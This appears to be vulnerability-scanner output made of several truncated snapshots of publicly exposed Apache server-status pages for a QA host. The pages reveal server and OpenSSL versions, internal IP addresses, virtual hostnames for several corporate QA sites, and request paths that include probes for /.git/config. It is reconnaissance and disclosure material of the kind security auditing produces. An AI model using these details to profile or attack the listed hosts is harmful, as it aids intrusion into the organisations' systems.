10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 18-028140/0/123_ 0.0071080540.00.003.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0284590/39/60R 0.21700078350.00.700.72 10.253.106.135http/1.1 20-013870/29/74_ 0.040993120.00.180.31 10.253.106.148http/1.1www-qa.patheon.kr:80GET /.git/config HTTP/1.1 21-016820/12/104_ 0.13174101830.00.381.13 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 22-0139814/15/70K 0.047188601763.00.751.14 10.253.106.148http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 23-0311320/7/41_ 0.0018033200.00.010.19 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 24-016830/1/89_ 0.001850115180.00.001.11 10.253.106.148http/1.1 25-028150/0/77_ 0.0071099110.00.000.89 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-014000/3/100R 0.002121396600.00.001.44 10.253.106.135http/1.1 27-014101/8/40K 0.007711866463.20.010.49 10.253.106.148http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/regions 28-0243700/45/74R 0.042111936660.00.200.39 10.253.106.148http/1.1 29-016840/2/90_ 0.00180132790.00.002.86 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 30-014120/3/81R 0.002121498290.00.012.70 10.253.106.135http/1.1 31-014130/4/44_ 0.0017036770.00.000.07 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 32-014140/23/173_ 0.01180143920.00.032.22 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 33-028160/0/59_ 0.00710106810.00.001.54 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-014920/78/173R 0.55702898290.00.954.22 10.253.106.135http/1.1 35-0243720/73/102R 0.082121387360.00.150.66 10.253.106.135http/1.1 36-028170/0/97_ 0.00710126530.00.002.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-0316600/18/80R 0.022124528179670.00.041.30 10.253.106.135http/1.1 38-0178657/84/92W 0.2700394510.91.271.40 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 39-023820/0/88R 0.00513052340.00.001.40 10.253.106.135http/1.1 40-023830/0/86R 0.00513073530.00.001.41 10.253.106.135http/1.1 41-028180/0/55_ 0.007007210.00.000.53 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0126480/105/118_ 0.27170101700.01.821.86 10.253.99.247http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 43-023840/0/53R 0.00513027690.00.000.20 10.253.106.135http/1.1 44-016870/3/79_ 0.001151059310.00.000.66 10.253.106.135http/1.1qa1.allergyinsider.com:80GET /index.html HTTP/1.1 45-023850/0/57R 0.00513039010.00.000.61 10.253.106.148http/1.1 46-023865/5/72K 0.0174295123300.60.290.67 10.253.106.148http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/vendor/jquery1. 47-023970/0/78R 0.00489084790.00.004.18 10.253.106.148http/1.1 48-0326040/21/561R 0.015119190760.00.034.96 10.253.106.148http/1.1 49-0326050/10/95R 0.0021212109310.00.011.05 10.253.106.148http/1.1 50-028190/0/131_ 0.0070084850.00.002.61 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-028200/0/48_ 0.0070011540.00.000.88 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-028210/0/161_ 0.00700192570.00.0010.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 53-028220/0/87_ 0.0070021070.00.000.64 127.0.0.1http/1.1qa1.allergyi
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cb388b6de
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 28-Aug-2023 18:26:58 EDT Restart Time: Friday, 25-Aug-2023 14:04:22 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 3 days 4 hours 22 minutes 36 seconds Server load: 0.16 0.03 0.01 Total accesses: 82778 - Total Traffic: 709.3 MB - Total Duration: 2578982 CPU Usage: u14.74 s34.43 cu96.57 cs30.47 - .0641% CPU load .301 requests/sec - 2705 B/second - 8.8 kB/request - 31.1554 ms/request 42 requests currently being processed, 30 idle workers __RKKK__KK_RR__R_R_RW___R_RRK_KK_RKKR_RR_R_RK___RRR__KKKKK__R_K_ __R_KRK..K...................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0284410/0/348_ 0.002460234580.00.003.79 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-0284420/0/370_ 0.002450201710.00.003.55 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-0159750/2/9395R 0.0038510125220.00.0018.23 10.253.106.148http/1.1 3-0278066/6/9207K 0.1713288664399.90.3918.45 10.253.106.148http/1.1qa1-chemicals.thermofisher.co.kGET /etc.clientlibs/diagnostics/components/structure/phadia_foo 4-0278073/3/395K 0.002484271904138.40.145.59 10.253.106.148http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 5-0196621/1/460K 0.00237584696011.90.0113.11 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2022.6.17. 6-0284430/0/455_ 0.002450429640.00.003.58 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-0284470/0/441_ 0.002440624070.00.0025.65 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0199714/5/485K 0.052371951603139.60.1443.77 10.253.106.135http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2022. 9-0237721/2/442K 0.0023747295584.10.003.46 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2022.6.17.419.c 10-0284480/0/395_ 0.002440192890.00.007.52 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 11-0230610/4/382R 0.267066306790.00.739.35 10.253.106.135http/1.1 12-0237740/1/286R 0.006900201390.00.003.77 10.253.106.135http/1.1 13-0284490/0/409_ 0.002440342240.00.006.36 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-0284500/0/438_ 0.002440621290.00.0011.84 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-0192630/2/304R 0.00707075690.00.001.54 10.253.106.148http/1.1 16-0284560/0/395_ 0.002430264670.00.004.26 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0230620/8/351R 0.0481841225600.00.145.47 10.253.106.148http/1.1 18-0284570/0/329_ 0.002430276140.00.003.93 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0237760/1/431R 0.006900114580.00.007.99 10.253.106.148http/1.1 20-02781313/13/312W 0.01003337465.70.067.67 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 21-0284580/0/424_ 0.002430255300.00.0029.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0284590/0/514_ 0.002430583480.00.0010.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0284600/0/517_ 0.0024301091760.00.0010.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0196700/27/435R 0.187060470630.00.554.97 10.253.106.135http/1.1 25-0284610/0/523_ 0.002430575440.00.007.08 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0237770/0/497R 0.007050322540.00.0010.24 10.253.106.135http/1.1 27-0199720/1/474R 0.0043311154060.00.0016.67 10.253.106.135http/1.1 28-01967615/19/361K 0.306891640061887.20.896.27 10.253.106.148http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 29-0284620/0/374_ 0.002430210810.00.004.84 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-02377819/20/340K 0.0511518739796.60.7812.47 10.253.106.135http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 31-0237798/10/278K 0.031321115073304.90.303.34 10.253.106.148http/1.1qa1-chemicals.thermofisher.co.kGET /etc.clientlibs/clientlibs/granite/jquery.min.js HTTP/1.1 32-0284630/0/429_ 0.002430437680.00.0013.28 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-0237800/0/341R 0.007050286420.00.0010.83 10.253.106.135http/1.1 34-0237813/5/309K 0.022471241952363.20.064.56 10.253.106.148http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2020.1.0.css 35-02378215/15/373K 0.1813212256371125.01.107.05 10.253.106.148http/1.1qa1-chemicals.thermofisher.co.kGET /etc/designs/diagnostics/clientlib-all.min.css HTTP/1.1 36-0204170/1/288R 0.007380177690.00.003.84 10.253.106.148http/1.1 37-0284640/0/303_ 0.002370240450.00.004.93 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-0237850/0/280R 0.007050250040.00.003.62 10.253.106.148http/1.1 39-0237860/0/323R 0.007050239880.00.007.24 10.253.106.135http/1.1 40-0284690/0/278_ 0.002360530920.00.005.28 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0278190/0/366R 0.003850654370.00.004.42 10.253.106.135http/1.1 42-0284700/0/364_ 0.002360205790.00.004.40 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0204180/1/337R 0.007380105740.00.0010.52 10.253.106.148http/1.1 44-01933118603/18603/18718K 11.53702426034035.833.2433.95 10.253.106.148http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 45-0278310/0/436_ 0.003650618270.00.004.08 10.253.106.135http/1.1 46-0278320/0/345_ 0.003650190130.00.005.89 10.253.106.135http/1.1 47-0278420/0/398_ 0.002310184010.00.0045.49 10.253.106.148http/1.1 48-0153070/14/445R 0.038180486570.00.075.65 10.253.106.148http/1.1 49-0204210/2/425R 0.007070318030.00.008.73 10.253.106.148http/1.1 50-0204220/10/341R 0.006909139280.00.015.32 10.253.106.135http/1.1 51-0278430/0/286_ 0.002310662150.00.003.83 10.253.106.148http/1.1 52-0284710/0/329_ 0.002350229280.00.007.56 127.0.0.1ht
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c71dbda04
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 26-Aug-2023 10:50:13 EDT Restart Time: Friday, 25-Aug-2023 14:04:22 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 hours 45 minutes 51 seconds Server load: 0.00 0.01 0.00 Total accesses: 25382 - Total Traffic: 216.1 MB - Total Duration: 1416558 CPU Usage: u7.4 s10.34 cu33.22 cs9.01 - .0802% CPU load .34 requests/sec - 3031 B/second - 8.7 kB/request - 55.8096 ms/request 36 requests currently being processed, 30 idle workers KRKK_RK_RWRRR____RR_RR_R__RR____RRRRR____R____RRR___R_.KR.RR__._ RRR.R_.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-020759/10/123K 0.0229581242.30.091.30 10.253.106.161http/1.1qa1-chemicals.thermofisher.co.kGET /login.action HTTP/1.1 1-020760/2/127R 0.003955131660.00.002.16 10.253.106.216http/1.1 2-06047475/7475/7475K 4.6140458613583.613.2713.27 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 3-06057475/7475/7475K 4.6060459113583.613.2713.27 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-067910/0/143_ 0.001470605440.00.002.07 10.253.106.161http/1.1 5-067920/16/182R 0.014409347920.00.024.91 10.253.106.216http/1.1 6-067938/8/188K 0.0122161984112.10.011.19 10.253.106.161http/1.1qa1.allergyinsider.com:80POST / HTTP/1.1 7-067990/0/218_ 0.00900419470.00.0023.73 10.253.106.216http/1.1 8-071420/0/158R 0.00454069540.00.004.33 10.253.106.161http/1.1 9-0714612/12/197W 0.0100970720.80.021.31 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 10-071470/0/150R 0.00453090130.00.002.56 10.253.106.216http/1.1 11-020810/0/115R 0.00300080900.00.002.31 10.253.106.216http/1.1 12-06270/6/115R 0.003984228530.00.010.55 10.253.106.161http/1.1 13-074490/0/147_ 0.00110116870.00.002.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-074500/0/200_ 0.00100361840.00.007.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-074510/0/139_ 0.0010036400.00.000.83 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-074520/0/132_ 0.009092910.00.002.11 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-061770/0/133R 0.00155079410.00.002.44 10.253.106.216http/1.1 18-0311080/7/116R 0.0382246162120.00.092.31 10.253.106.161http/1.1 19-061780/2/177_ 0.00155433280.00.004.31 10.253.106.161http/1.1 20-058320/1/96R 0.00605645080.00.021.27 10.253.106.161http/1.1 21-058330/3/128R 0.0059319129560.00.002.13 10.253.106.161http/1.1 22-074530/0/223_ 0.0090388230.00.005.65 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-061790/0/230R 0.001550861080.00.004.43 10.253.106.216http/1.1 24-06320/45/211_ 0.17110218990.00.643.04 10.253.106.161http/1.1www-qa.patheon.kr:80GET /.git/config HTTP/1.1 25-074540/0/155_ 0.009084570.00.001.81 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-047510/6/160R 0.03398163050.00.113.21 10.253.106.216http/1.1 27-0305060/33/148R 0.395174489310.01.1013.66 10.253.106.161http/1.1 28-074550/0/132_ 0.0090195610.00.001.43 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-074560/0/154_ 0.008083450.00.002.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-074570/0/95_ 0.008070890.00.001.65 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-074580/0/87_ 0.008075720.00.000.80 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-047520/12/161R 0.153981225300.00.513.74 10.253.106.216http/1.1 33-058370/2/131R 0.0070314190310.00.002.60 10.253.106.161http/1.1 34-058380/1/135R 0.0060513131500.00.002.18 10.253.106.161http/1.1 35-047550/0/91R 0.00594033740.00.001.10 10.253.106.161http/1.1 36-058390/0/103R 0.008220116440.00.002.43 10.253.106.161http/1.1 37-074590/0/143_ 0.0080128590.00.001.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-074600/0/108_ 0.0080176060.00.001.55 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-074610/0/163_ 0.008047370.00.000.84 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-074620/0/65_ 0.008052620.00.000.88 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-08730/35/168R 0.1628814616410.01.002.05 10.253.106.216http/1.1 42-061820/0/65_ 0.00155093140.00.000.60 10.253.106.161http/1.1 43-074630/0/82_ 0.008012740.00.001.06 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-074640/0/104_ 0.0030124170.00.000.32 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-074680/0/136_ 0.0020224610.00.001.66 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0327650/8/97R 0.013001451130.00.011.11 10.253.106.216http/1.1 47-047600/6/128R 0.00300028880.00.012.17 10.253.106.216http/1.1 48-061840/0/108R 0.001550211150.00.002.47 10.253.106.216http/1.1 49-061850/0/124_ 0.001510118580.00.001.56 10.253.106.161http/1.1 50-074690/0/126_ 0.002080850.00.003.20 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-061860/0/125_ 0.001510571510.00.000.60 10.253.106.161http/1.1 52-047610/0/155R 0.00594094680.00.001.13 10.253.106.161http/1.1 53-03020/18/176_ 0.0114714202570.00.053.03 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 54-0-0/0/150. 0.001015029260.00.003.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 55-03041/18/127K 0.01121164081.10.050.68 10.253.106.216h
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c36468903
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 25-Aug-2023 08:15:39 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 9 days 21 hours 37 minutes 16 seconds Server load: 0.00 0.02 0.00 Total accesses: 272965 - Total Traffic: 2.6 GB - Total Duration: 11175363 CPU Usage: u65.74 s117.54 cu350.52 cs92.23 - .0732% CPU load .319 requests/sec - 3295 B/second - 10.1 kB/request - 40.9406 ms/request 23 requests currently being processed, 25 idle workers RRRKK__K._____R__.._R_..._..RR__.KR_WK._..R_.___R_....R_RKR_..__ R..R.R.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-049650/2/1504R 0.0063402031170.00.0175.04 10.253.106.161http/1.1 1-037330/8/1518R 0.0163401896620.00.0153.11 10.253.106.161http/1.1 2-073330/0/1438R 0.0063401716360.00.0063.45 10.253.106.216http/1.1 3-01726120008/85544/85544K 52.093052166156851.5153.18153.18 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-01726220008/85544/85544K 52.110051856156851.0153.17153.17 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-093800/0/1529_ 0.00001084520.00.0030.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 6-049660/2/1351_ 0.046210947540.00.1019.90 10.253.100.5http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 7-059872/2/1420K 0.00118775893.00.0033.15 10.253.106.161http/1.1www-qa.patheon.kr:80GET /akamai/sureroute-test-object.html HTTP/1.1 8-0-0/0/1512. 0.0062601550380.00.0052.85 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 9-0326950/13/1467_ 0.0232971255300.00.1338.41 10.253.106.161http/1.1 10-049710/0/1370_ 0.0062601694160.00.0027.82 10.253.106.161http/1.1 11-0326970/36/1682_ 0.13220761502970.00.3936.01 10.253.106.161http/1.1 12-085850/0/1596_ 0.0032201053940.00.0030.14 10.253.106.216http/1.1 13-049730/1/1520_ 0.0045961578850.00.0235.63 10.253.106.216http/1.1 14-060080/5/1475R 0.0063317979410.00.0227.35 10.253.106.161http/1.1 15-085860/1/1655_ 0.0013192748100.00.0037.73 10.253.106.216http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 16-085890/0/1357_ 0.0032201085660.00.0029.57 10.253.106.161http/1.1 17-0-0/0/1140. 0.0062501014570.00.0019.78 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0-0/0/1494. 0.0032702086600.00.0033.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-050750/18/1523_ 0.0113121715700.00.1117.85 10.253.106.216http/1.1 20-060100/0/1363R 0.0063401408330.00.0026.84 10.253.106.216http/1.1 21-085910/1/1444_ 0.00220101960960.00.0051.25 10.253.106.161http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 22-0-0/0/1361. 0.0032601348640.00.0026.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0-0/0/1517. 0.0032002159610.00.0032.33 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0-0/0/1468. 0.0062401424180.00.0033.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0307770/5/1464_ 0.0022001224640.00.0920.67 10.253.106.161http/1.1 26-0-0/0/1246. 0.006230971890.00.0016.79 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-0-0/0/1338. 0.0062902057620.00.0034.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-037400/23/1174R 0.24634141509250.01.2823.32 10.253.106.161http/1.1 29-081280/0/1951R 0.0076001137220.00.0029.22 10.253.106.161http/1.1 30-052100/1/1224_ 0.0032901947130.00.0017.67 10.253.106.161http/1.1 31-052110/1/1260_ 0.00329121631230.00.0032.97 10.253.106.161http/1.1 32-0-0/0/1632. 0.0031901073940.00.0043.21 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-081304/4/1265K 0.001141057766.00.0124.30 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 34-068780/0/1330R 0.0063401079360.00.0021.38 10.253.106.161http/1.1 35-081310/14/2048_ 0.0163214058540.00.0321.38 10.253.106.216http/1.1www.qa.thermofisher.com:80GET /bindingsite/gb/en/2023-7-0.html HTTP/1.1 36-037448/8/1005W 0.010016747311.50.0112.91 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 37-081321/7/1257K 0.001121414751.10.0330.74 10.253.106.216http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 38-0-0/0/1357. 0.0062201095780.00.0027.65 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-052150/40/1353_ 0.03131141325300.02.6328.76 10.253.106.216http/1.1 40-0-0/0/1829. 0.0061901589360.00.0044.07 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0-0/0/1185. 0.0063101294290.00.0020.27 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-068810/0/1434R 0.0063401688120.00.0025.87 10.253.106.161http/1.1 43-0314550/18/1353_ 0.0732701477960.00.1727.23 10.253.106.216http/1.1 44-0-0/0/1322. 0.0062101402400.00.0018.87 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-068840/25/1399_ 0.0362701009710.00.5530.42 10.253.106.161http/1.1www.qa.thermofisher.com:80GET /content/dam/diagnostics/Flyer_GRDWebinar.pdf HTTP/1.1 46-052160/4/1572_ 0.00626151421930.00.0034.88 10.253.106.161http/1.1 47-0314570/0/1299_ 0.0045701450110.00.0020.06 10.253.106.161http/1.1 48-068850/0/1274R 0.0063401586030.00.0072.47 10.253.106.161http/1.1 49-068860/9/1450_ 0.0032901901850.00.1049.16 10.253.106.161http/1.1 50-0-0/0/1215. 0.006200942680.00.0024.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-0-0/0/1138. 0.0061601326200.00.0021.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0-0/0/1366. 0.0060702481200.00.0023.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 53-0-0/0/1300. 0.0061801668940.00.0033.95 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 54-082560/0/1559R
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c9f849635
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 24-Aug-2023 07:08:47 EDT Restart Time: Tuesday, 15-Aug-2023 10:38:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 8 days 20 hours 30 minutes 24 seconds Server load: 0.16 0.03 0.01 Total accesses: 245636 - Total Traffic: 2.4 GB - Total Duration: 10416568 CPU Usage: u58.27 s105.1 cu315.57 cs83.2 - .0735% CPU load .321 requests/sec - 3349 B/second - 10.2 kB/request - 42.4065 ms/request 34 requests currently being processed, 45 idle workers RRRKKRRRR_R__RRR__R_RR____K__R______RRRR_______R_KR___KR__R__R_R R___R_W__R_____................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0223300/0/1317R 0.0034601946760.00.0067.71 10.253.106.216http/1.1 1-0215760/5/1377R 0.0265101841260.00.0650.31 10.253.106.161http/1.1 2-0223310/0/1212R 0.0034601513960.00.0053.31 10.253.106.216http/1.1 3-01726110967/76503/76503K 46.550046627140236.7136.95136.95 10.253.106.161http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-01726210966/76502/76502K 46.577046353140234.3136.95136.95 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0170330/4/1439R 0.0065101001540.00.0029.20 10.253.106.161http/1.1 6-0176160/0/1213R 0.006500888320.00.0019.24 10.253.106.161http/1.1 7-0176170/4/1310R 0.0065111721230.00.0031.86 10.253.106.161http/1.1 8-0197550/8/1367R 0.0062301528000.00.0350.56 10.253.106.161http/1.1 9-0230610/0/1303_ 0.00401156530.00.0034.41 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-0154980/5/1269R 0.01651451632200.00.0327.20 10.253.106.161http/1.1 11-0230620/0/1564_ 0.00301435940.00.0034.29 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 12-0230630/0/1493_ 0.0030986780.00.0029.27 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 13-0215810/0/1392R 0.0034601541360.00.0032.36 10.253.106.216http/1.1 14-0197710/0/1297R 0.006510878420.00.0023.48 10.253.106.161http/1.1 15-0197780/12/1578R 0.0162002729220.00.0737.20 10.253.106.216http/1.1 16-0230640/0/1270_ 0.00201016880.00.0028.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0230650/0/1038_ 0.0020994390.00.0017.85 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0197870/6/1327R 0.0162302023120.00.0325.34 10.253.106.216http/1.1 19-0230660/0/1405_ 0.00201677280.00.0016.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 20-0197880/0/1227R 0.0064101343110.00.0024.17 10.253.106.161http/1.1 21-0155000/13/1318R 0.1664131899910.00.5248.93 10.253.106.216http/1.1 22-0230670/0/1201_ 0.00201271080.00.0021.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0230680/0/1363_ 0.00102020210.00.0030.26 